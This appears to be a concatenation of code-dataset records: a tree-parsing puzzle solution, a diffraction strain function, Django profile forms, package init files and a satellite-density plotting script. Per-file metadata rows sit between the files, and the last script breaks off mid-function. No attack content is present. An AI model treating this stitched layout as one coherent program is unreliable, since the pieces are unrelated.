7 7 3 1 3 1 1 1 2 3 4 1 3 2 3 4 1 9 0 8 2 4 8 2 9 1 1 4 2 2 3 1 3 3 1 3 3 1 7 0 9 3 2 8 6 6 1 8 5 5 1 3 2 1 2 1 1 1 5 0 6 3 8 8 1 7 5 3 3 1 3 1 3 5 4 3 3 5 1 9 0 7 7 1 7 5 2 1 1 2 3 3 2 1 3 3 1 1 1 9 0 9 1 3 1 3 9 3 4 5 9 3 2 3 2 1 1 3 1 1 1 7 0 8 3 7 1 6 1 5 3 4 3 3 2 1 1 2 1 2 2 2 2 5 2 5 7 5 5 3 3 5 1 7 0 8 9 1 4 7 8 6 5 9 3 3 3 1 1 3 1 1 9 0 8 3 2 6 1 2 7 1 8 1 2 1 2 2 1 3 3 3 1 9 0 6 9 3 7 1 1 6 1 3 2 2 2 3 1 2 3 2 4 2 3 3 3 4 1 9 0 10 2 1 4 2 9 1 3 2 6 7 3 2 1 1 2 1 3 2 3 1 6 0 6 2 4 6 4 9 1 1 3 2 1 1 1 1 9 0 7 7 1 1 8 5 9 1 1 3 3 1 1 1 3 2 1 3 4 2 2 3 6 1 6 0 10 3 8 9 6 2 1 6 2 5 1 2 1 3 3 1 1 1 8 0 7 4 3 9 1 1 1 2 3 3 2 2 1 2 2 2 1 7 0 11 5 7 3 2 2 9 5 1 3 7 1 3 2 1 1 1 2 3 5 5 5 3 4 1 3 6 1 9 0 10 9 9 1 1 1 1 1 2 1 6 2 1 2 1 1 1 2 2 3 1 9 0 9 7 3 7 1 9 4 1 4 7 1 1 2 3 3 2 1 2 1 1 6 0 10 2 1 2 7 8 6 6 2 5 3 3 1 1 1 3 1 4 3 4 2 3 5 3 4 1 7 0 6 3 2 7 1 9 1 3 3 3 1 2 1 2 1 7 0 8 9 5 9 6 8 1 2 3 1 1 2 1 3 1 1 1 9 0 6 2 6 1 5 1 4 1 3 3 3 3 2 1 2 3 2 1 4 4 3 5 5 4 3 3 7 1 8 0 11 8 7 5 1 1 8 1 8 7 3 9 2 2 2 1 1 2 1 3 1 5 0 11 1 8 5 1 9 7 3 4 9 4 1 3 3 1 3 2 1 5 0 9 9 5 1 6 3 7 3 1 4 1 1 2 2 1 1 2 4 5 2 4 4 3 4 1 8 0 9 6 7 8 1 4 3 7 4 5 1 1 1 1 3 3 2 1 1 5 0 11 4 8 1 1 1 2 4 4 1 5 1 2 1 1 1 1 1 9 0 9 5 3 4 5 4 1 2 5 8 3 2 2 1 1 2 2 1 2 3 2 3 2 3 7 1 7 0 11 6 7 1 9 9 8 3 4 7 9 8 1 2 3 1 2 1 1 1 5 0 7 9 1 8 5 1 1 8 1 3 1 2 1 1 9 0 11 3 9 1 4 3 8 2 1 4 9 5 2 1 1 3 2 3 3 3 1 3 5 3 5 2 4 2 3 5 1 6 0 9 1 2 8 3 3 1 5 9 8 2 1 3 2 2 1 1 6 0 11 7 5 2 7 1 2 4 4 1 1 4 2 2 2 2 1 1 1 6 0 8 3 2 4 1 8 6 4 6 1 1 2 2 1 3 2 4 3 4 5 5 6 3 4 3 3 4 1 5 0 10 2 3 8 5 6 1 1 5 2 8 2 2 1 2 1 1 9 0 11 9 1 7 4 9 8 1 8 4 3 1 2 3 2 2 3 2 1 1 3 1 7 0 7 9 5 5 9 1 5 1 1 2 3 3 2 1 1 1 4 5 1 3 7 1 5 0 7 2 6 1 4 1 1 6 2 1 2 3 1 1 6 0 6 1 1 5 2 6 4 2 2 3 1 1 1 1 7 0 9 1 7 1 1 8 4 7 7 8 1 2 2 2 2 1 2 1 2 1 3 1 4 5 3 4 1 8 0 10 1 1 5 6 7 6 6 6 9 5 1 1 1 1 1 2 1 2 1 5 0 6 5 1 4 1 3 9 2 2 1 2 3 1 9 0 10 4 8 6 3 1 8 5 9 5 1 2 2 3 2 1 1 2 1 1 3 1 5 3 3 4 1 6 0 10 6 9 9 1 5 1 8 6 5 5 3 3 2 3 1 1 1 6 0 9 1 1 2 
8 8 7 5 1 9 1 3 1 1 2 1 1 5 0 9 1 1 9 7 7 9 5 1 8 3 1 1 3 3 1 1 5 1 3 2 3 3 6 3 8 2 6 7 5 1 6 4 3 9 4"
#numbers = "2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2"
def ids_gen():
    # Infinite generator of sequential node ids (1, 2, 3, ...).
    x = 1
    while True:
        yield x
        x += 1

ids = ids_gen()

def parse_node(numbers):
    # Recursively parse one node: the header gives (child count, metadata
    # count), followed by the child nodes and then the metadata entries.
    numbers = iter(numbers)
    c_id = next(ids)
    children_n = next(numbers)
    children = []
    metadata_n = next(numbers)
    metadata = []
    for x in range(children_n):
        children.append(parse_node(numbers))
    for x in range(metadata_n):
        metadata.append(next(numbers))
    return [c_id, children, metadata]

def total_sum(nodemap):
    # Sum of every metadata entry in the whole tree.
    return sum(map(total_sum, nodemap[1])) + sum(nodemap[2])

def special_sum(nodemap):
    # Leaf nodes are worth their metadata sum; otherwise each metadata entry
    # is a 1-based index into the children (out-of-range entries are skipped).
    if len(nodemap[1]) == 0:
        return sum(nodemap[2])
    total = 0
    for r in nodemap[2]:
        if r in range(1, len(nodemap[1]) + 1):
            total += special_sum(nodemap[1][r - 1])
    return total

numbers = list(map(int, numbers.split(" ")))
root = parse_node(numbers)
print(total_sum(root))
print(special_sum(root))
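The commented-out string above looks like the standard worked example for this header/metadata tree format. Under that assumption, a compact, self-contained restatement of the same parsing scheme gives 138 for the plain metadata sum and 66 for the child-indexed sum on that sample:

```python
from itertools import count

ids = count(1)  # same role as ids_gen(): sequential node ids

def parse_node(numbers):
    # Header is (child count, metadata count), then children, then metadata.
    numbers = iter(numbers)
    c_id = next(ids)
    children_n = next(numbers)
    metadata_n = next(numbers)
    children = [parse_node(numbers) for _ in range(children_n)]
    metadata = [next(numbers) for _ in range(metadata_n)]
    return [c_id, children, metadata]

def total_sum(node):
    return sum(total_sum(c) for c in node[1]) + sum(node[2])

def special_sum(node):
    if not node[1]:
        return sum(node[2])
    return sum(special_sum(node[1][r - 1])
               for r in node[2] if 1 <= r <= len(node[1]))

sample = "2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2"
root = parse_node(map(int, sample.split()))
print(total_sum(root))    # 138
print(special_sum(root))  # 66
```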
| 769.023256 | 32,072 | 0.506532 | 16,063 | 33,068 | 1.041711 | 0.003175 | 0.157174 | 0.076555 | 0.032033 | 0.851192 | 0.693779 | 0.522261 | 0.288651 | 0.101596 | 0.029702 | 0 | 0.958212 | 0.489083 | 33,068 | 42 | 32,073 | 787.333333 | 0.032199 | 0.001421 | 0 | 0 | 0 | 0.029412 | 0.970957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0.029412 | 0.117647 | 0.058824 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
27157d35ef7dbf12c8c7abc7071b48ae43b32fce | 2,989 | py | Python | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | null | null | null | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | null | null | null | easistrain/EDD/EDD_Test_fund_method.py | woutdenolf/easistrain | 0484168e33e548af01a5cc649abf815c45b182f1 | [
"MIT"
] | 1 | 2021-08-04T14:02:16.000Z | 2021-08-04T14:02:16.000Z | import numpy as np
import scipy.optimize
def diffVector(angles, e11, e22, e33, e23, e13, e12):
    # Diffraction-vector components (q1, q2, q3) in the sample frame from the
    # goniometer angles (phi, chi, omega, theta, delta), given in degrees as
    # the columns of `angles`, plus the strain measured along that direction
    # for the strain tensor components (e11 ... e12).
phi = np.radians(angles[:, 0])
chi = np.radians(angles[:, 1])
omega = np.radians(angles[:, 2])
theta = np.radians(angles[:, 3])
delta = np.radians(angles[:, 4])
q1 = (
(np.cos(theta) * np.cos(chi) * np.sin(delta) * np.sin(phi))
+ (
np.cos(delta)
* np.cos(theta)
* (
(np.cos(phi) * np.sin(omega))
- (np.cos(omega) * np.sin(phi) * np.sin(chi))
)
)
- np.sin(theta)
* ((np.cos(phi) * np.cos(omega)) + (np.sin(phi) * np.sin(chi) * np.sin(omega)))
)
q2 = (
np.cos(delta)
* np.cos(theta)
* ((np.cos(phi) * np.cos(omega) * np.sin(chi)) + (np.sin(phi) * np.sin(omega)))
- (np.cos(theta) * np.cos(phi) * np.cos(chi) * np.sin(delta))
- (
np.sin(theta)
* (
(np.cos(omega) * np.sin(phi))
- (np.cos(phi) * np.sin(chi) * np.sin(omega))
)
)
)
q3 = (
(np.cos(delta) * np.cos(theta) * np.cos(chi) * np.cos(omega))
+ (np.cos(theta) * np.sin(delta) * np.sin(chi))
+ (np.cos(chi) * np.sin(theta) * np.sin(omega))
)
defDirMeas = (
(e11 * q1 ** 2)
+ (e22 * q2 ** 2)
+ (e33 * q3 ** 2)
+ (2 * e12 * q1 * q2)
+ (2 * e13 * q1 * q3)
+ (2 * e23 * q2 * q3)
)
return q1, q2, q3, defDirMeas
def deforDirMeas(angles, e11, e22, e33, e23, e13, e12):
    # Identical computation to diffVector, but returning only the measured
    # strain; delegate to avoid duplicating the q1/q2/q3 expressions.
    return diffVector(angles, e11, e22, e33, e23, e13, e12)[3]
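As a sanity check of the geometry in diffVector above, with all five goniometer angles at zero the diffraction vector should reduce to (0, 0, 1), so the measured strain is just e33. The sketch below is a compact, self-contained restatement (renamed `diff_vector`, with hypothetical strain values) demonstrating that limit:

```python
import numpy as np

def diff_vector(angles, e11, e22, e33, e23, e13, e12):
    # Compact restatement of diffVector (angle columns in degrees).
    phi, chi, omega, theta, delta = (np.radians(angles[:, i]) for i in range(5))
    q1 = (np.cos(theta) * np.cos(chi) * np.sin(delta) * np.sin(phi)
          + np.cos(delta) * np.cos(theta) * (np.cos(phi) * np.sin(omega)
                                             - np.cos(omega) * np.sin(phi) * np.sin(chi))
          - np.sin(theta) * (np.cos(phi) * np.cos(omega)
                             + np.sin(phi) * np.sin(chi) * np.sin(omega)))
    q2 = (np.cos(delta) * np.cos(theta) * (np.cos(phi) * np.cos(omega) * np.sin(chi)
                                           + np.sin(phi) * np.sin(omega))
          - np.cos(theta) * np.cos(phi) * np.cos(chi) * np.sin(delta)
          - np.sin(theta) * (np.cos(omega) * np.sin(phi)
                             - np.cos(phi) * np.sin(chi) * np.sin(omega)))
    q3 = (np.cos(delta) * np.cos(theta) * np.cos(chi) * np.cos(omega)
          + np.cos(theta) * np.sin(delta) * np.sin(chi)
          + np.cos(chi) * np.sin(theta) * np.sin(omega))
    strain = (e11 * q1 ** 2 + e22 * q2 ** 2 + e33 * q3 ** 2
              + 2 * e12 * q1 * q2 + 2 * e13 * q1 * q3 + 2 * e23 * q2 * q3)
    return q1, q2, q3, strain

angles = np.zeros((1, 5))  # phi = chi = omega = theta = delta = 0
q1, q2, q3, strain = diff_vector(angles, e11=1e-3, e22=2e-3, e33=3e-3,
                                 e23=0.0, e13=0.0, e12=0.0)
print(q1, q2, q3, strain)  # q -> (0, 0, 1), strain -> e33 = 3e-3
```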
| 30.191919 | 87 | 0.424891 | 396 | 2,989 | 3.207071 | 0.085859 | 0.181102 | 0.110236 | 0.113386 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0.930709 | 0 | 0.051377 | 0.368351 | 2,989 | 98 | 88 | 30.5 | 0.621292 | 0 | 0 | 0.765957 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021277 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
27adf2119869e9c68d0a3c070336f9f551af44d9 | 12,320 | py | Python | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
] | null | null | null | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
] | null | null | null | directoalartista/apps/myaccount/forms.py | mpampols/directoalartista.com | 833eea7f4db5a2343dba4314793d593cd66cf1fb | [
"MIT"
] | 1 | 2018-03-29T02:16:18.000Z | 2018-03-29T02:16:18.000Z | # -*- coding: utf-8 -*-
from django.forms import ModelForm
from django.db import models
from django import forms
from django.contrib.admin.widgets import *
from localflavor.es.forms import ESProvinceSelect, ESIdentityCardNumberField, ESPostalCodeField, ESPhoneNumberField
from directoalartista.apps.genericuser.models import GenericUser
from django.contrib.auth import get_user_model
User = get_user_model()
class GenericUserEditProfileFormArtist(ModelForm):
    user = models.ForeignKey(User, unique=True)  # NB: model fields declared on a ModelForm are ignored by the form machinery
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'placeholder': 'El de verdad, no el artístico',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
fields = {"email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"actual_password", "new_password", "new_password_repeat", "newsletter_subscription"}
def __unicode__(self):
return unicode(self.user)
class GenericUserEditProfileFormAgency(ModelForm):
    user = models.ForeignKey(User, unique=True)  # NB: model fields declared on a ModelForm are ignored by the form machinery
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
agency_name = forms.CharField(max_length=255, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='Nombre de la agencia'
)
agency_company_name = forms.CharField(max_length=255, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='Razón social'
)
agency_cif = forms.CharField(max_length=15, required=True, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
}),
label='CIF'
)
agency_additional_info = forms.CharField(max_length=1000, required=False, widget=forms.Textarea(
attrs={
'class': 'form-control',
'required': 'false'
}),
label='Información adicional'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
'type': 'password',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
fields = {"email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"agency_additional_info", "agency_cif", "agency_company_name", "agency_name", "actual_password",
"new_password", "new_password_repeat", "newsletter_subscription"}
def __unicode__(self):
return unicode(self.user)
class GenericUserEditProfileFormPromoter(ModelForm):
    user = models.ForeignKey(User, unique=True)  # NB: model fields declared on a ModelForm are ignored by the form machinery
email = forms.CharField(max_length=75, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'email',
}),
label='Email'
)
phone = ESPhoneNumberField(max_length=15, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true',
'type': 'tel',
}),
label='Teléfono'
)
first_name = forms.CharField(max_length=30, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre'
)
last_name = forms.CharField(max_length=60, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Apellidos'
)
dni = forms.CharField(max_length=10, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='DNI'
)
address = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control'
}),
label='Dirección'
)
postal_code = ESPostalCodeField(max_length=10, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Código postal'
)
city = forms.CharField(max_length=80, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Ciudad'
)
province = forms.CharField(max_length=80, widget=ESProvinceSelect(
attrs={
'class': 'form-control',
}),
label='Provincia'
)
promoter_room_or_event_name = forms.CharField(max_length=255, widget=forms.TextInput(
attrs={
'class': 'form-control',
'required': 'true'
}),
label='Nombre de la sala o evento*'
)
promoter_company_name = forms.CharField(max_length=255, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='Razón social'
)
promoter_cif = forms.CharField(max_length=15, required=False, widget=forms.TextInput(
attrs={
'class': 'form-control',
}),
label='CIF'
)
promoter_additional_info = forms.CharField(max_length=1000, required=False, widget=forms.Textarea(
attrs={
'class': 'form-control',
}),
label='Información adicional'
)
actual_password = forms.CharField(max_length=60, required=False, widget=forms.PasswordInput(
attrs={
'class': 'form-control',
}),
label='Contraseña'
)
new_password = forms.CharField(max_length=60, required=False, widget=forms.PasswordInput(
attrs={
'class': 'form-control',
}),
label='Nueva contraseña'
)
new_password_repeat = forms.CharField(max_length=60, required=False, widget=forms.PasswordInput(
attrs={
'class': 'form-control',
}),
label='Repite la nueva contraseña'
)
newsletter_subscription = forms.BooleanField(required=False)
class Meta:
model = GenericUser
# Use a list, not a set: set iteration order is arbitrary, which makes the rendered field order nondeterministic.
fields = ["email", "phone", "first_name", "last_name", "dni", "address", "postal_code", "city", "province",
"promoter_room_or_event_name", "promoter_company_name", "promoter_cif", "promoter_additional_info",
"actual_password", "new_password", "new_password_repeat", "newsletter_subscription"]
def __unicode__(self):
return unicode(self.user)
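Both profile forms declare a `new_password` / `new_password_repeat` pair, but the cross-field check is not shown in this excerpt. Below is a minimal, framework-free sketch of the confirmation logic such a form's `clean()` method would need; the function name and error messages are hypothetical, not part of the original code.

```python
def validate_password_change(cleaned_data):
    """Return a list of error messages for the password-change fields.

    Mirrors the check a Django form's clean() would perform on the
    new_password / new_password_repeat pair declared above.
    """
    errors = []
    actual = cleaned_data.get("actual_password") or ""
    new = cleaned_data.get("new_password") or ""
    repeat = cleaned_data.get("new_password_repeat") or ""
    if new or repeat:
        # Changing the password requires the current one for re-authentication.
        if not actual:
            errors.append("Introduce tu contraseña actual.")
        if new != repeat:
            errors.append("Las nuevas contraseñas no coinciden.")
    return errors
```

In a real `ModelForm` the same checks would live in `clean()` and raise `forms.ValidationError` instead of returning a list.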
| 30.723192 | 117 | 0.516071 | 1,058 | 12,320 | 5.879017 | 0.106805 | 0.063666 | 0.099035 | 0.148553 | 0.886495 | 0.878457 | 0.873633 | 0.86463 | 0.861736 | 0.861736 | 0 | 0.012658 | 0.358766 | 12,320 | 400 | 118 | 30.8 | 0.774684 | 0.001705 | 0 | 0.789318 | 0 | 0 | 0.178174 | 0.013255 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008902 | false | 0.065282 | 0.020772 | 0.008902 | 0.204748 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
fda12589643014bae8ffbc22525fe1b15f309d40 | 118 | py | Python | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | 1 | 2021-09-29T20:01:41.000Z | 2021-09-29T20:01:41.000Z | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | null | null | null | ou_Axion_limit/__init__.py | OuYangMinOa/ou_Axion_limit | 7f68dd906579b3cd255fa3098f9b1d6d44e412b3 | [
"MIT"
] | null | null | null | from ou_Axion_limit.Glimit import Glimit
from ou_Axion_limit.Analy import analyse
if __name__ == "__main__":
pass
| 16.857143 | 41 | 0.79661 | 18 | 118 | 4.555556 | 0.666667 | 0.146341 | 0.268293 | 0.390244 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144068 | 118 | 6 | 42 | 19.666667 | 0.811881 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
fdb6e1ad7ec60624db0ae18c5509acf5fa8bd887 | 141 | py | Python | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 2 | 2019-05-12T18:48:38.000Z | 2019-09-25T22:21:09.000Z | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 7 | 2019-04-05T14:20:46.000Z | 2022-03-11T23:32:14.000Z | bot/text_src/__init__.py | JakubKoralewski/idiotduo-biblia-twitter | 6aa65378f0964fee7d0cc305e755962acdee9b37 | [
"MIT"
] | 3 | 2019-05-12T18:51:26.000Z | 2020-08-25T22:11:08.000Z | from .bible.zdobadz_cytat import zdobadz_cytat
from .lexical.slowo_na_dzis import slowo_na_dzis
from .rnm.get_rnm_quote import get_rnm_quote
| 35.25 | 48 | 0.87234 | 25 | 141 | 4.52 | 0.48 | 0.212389 | 0.19469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 141 | 3 | 49 | 47 | 0.875969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fdd13fbba46b87a629b5978ff051acac390c6e15 | 15,568 | py | Python | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 19 | 2021-08-07T08:49:22.000Z | 2022-03-02T18:26:30.000Z | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 4 | 2021-11-09T05:53:42.000Z | 2022-03-25T11:49:37.000Z | test/test_swarm.py | JouleCai/GeoSpaceLab | 6cc498d3c32501e946931de596a840c73e83edb3 | [
"BSD-3-Clause"
] | 3 | 2021-11-07T11:41:20.000Z | 2022-02-14T13:43:11.000Z | import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from loaders.load_uta_gitm_201602_newrun import *
import utilities.datetime_utilities as du
import visualization.time_series as ts
from geospacelab.visualization.mpl.geomap.geopanels import PolarMapPanel as PolarMap
import geospacelab.visualization.mpl.colormaps as cm
def get_swarm_data(dt_fr, dt_to, satID="C"):
dt_range = [dt_fr, dt_to]
instr_info1 = {'name': 'SWARM-' + satID, 'assign_key': 'SWARM_ACC'}
database = 'uta'
paralist = [
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_SC'},
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_s450'},
{'database': database, 'instrument': instr_info1, 'paraname': 'N_n_s500'},
]
paras_layout = [[1, 2]]
tsObj = ts.TimeSeries(dt_range=dt_range, paralist=paralist, paras_layout=paras_layout, timeline='multiple')
sc_lat = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_LAT']
sc_lon = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_LON']
sc_lst = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_GEO_ST']
sc_datetime = tsObj.dataObjs['uta_swarm_c_acc'].paras['SC_DATETIME']
rho_n_sc = tsObj.dataObjs['uta_swarm_c_acc'].paras['N_n_SC']
swarm_data = {
'sc_lat': sc_lat,
'sc_lon': sc_lon,
'sc_lst': sc_lst,
'sc_datetime': sc_datetime,
'rho_n_sc': rho_n_sc
}
return swarm_data
def show_rho_n(dt_fr, dt_to):
swarm_data = get_swarm_data(dt_fr, dt_to)
sc_lon = swarm_data['sc_lon'].flatten()
sc_lat = swarm_data['sc_lat'].flatten()
sc_dt = swarm_data['sc_datetime'].flatten()
rho_n_sc = swarm_data['rho_n_sc'].flatten()
plt.figure(figsize=(8,8))
# cs = 'GEO'
# panel = PolarView(cs='GEO', sytle='lst-fixed', pole='N', lon_c=None, lst_c=0, mlt_c=None, ut=dt_fr, boundary_lat=30., proj_style='Stereographic')
cs = 'AACGM'
panel = PolarMap(cs=cs, style='mlt-fixed', pole='N', lon_c=None, lst_c=None, mlt_c=0, ut=dt_fr, boundary_lat=30., proj_style='Stereographic')
panel.add_subplot(major=True)
panel.set_extent(boundary_style='circle')
data = panel.projection.transform_points(ccrs.PlateCarree(), sc_lon, sc_lat)
x = data[:, 0]
y = data[:, 1]
from scipy.stats import linregress
coef = linregress(x, y)
a = coef.slope
b = coef.intercept
# x1 = np.linspace(np.nanmin(x), np.nanmax(x), num=500)
# y1 = np.linspace(np.nanmin(y), np.nanmax(y), num=500)
# x2d, y2d = np.meshgrid(x, y)
# z2d = griddata(data[:, 0:2], rho_n_sc.flatten(), (x2d, y2d), method='nearest')
# z2d_dist = np.abs(a*x2d - y2d + b) / np.sqrt(a**2 + 1)
# z2d = np.where(z2d_dist>1000, np.nan, z2d)
#
# im = panel.major_ax.pcolormesh(x2d, y2d, z2d, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
# panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
# xx = np.tile(x, [3, 1])
#
# yy = np.concatenate((y[np.newaxis, :]-150000, y[np.newaxis, :], y[np.newaxis, :]+150000), axis=0)
# zz = np.concatenate((rho_n_sc.T, rho_n_sc.T, rho_n_sc.T), axis=0)
#
# zz = griddata(data[:, 0:2], rho_n_sc.flatten(), (xx, yy), method='nearest')
# im = panel.major_ax.pcolormesh(xx, yy, zz, vmin=2e-14, vmax=20e-13, cmap='gist_ncar')
#
# # panel.major_ax.plot(sc_lon, sc_lat, transform=ccrs.Geodetic(), linewidth=0.5, color='k')
# plt.colorbar(im)
#panel.major_ax.plot(data[:,0], data[:,1], linewidth=3)
from matplotlib.collections import LineCollection
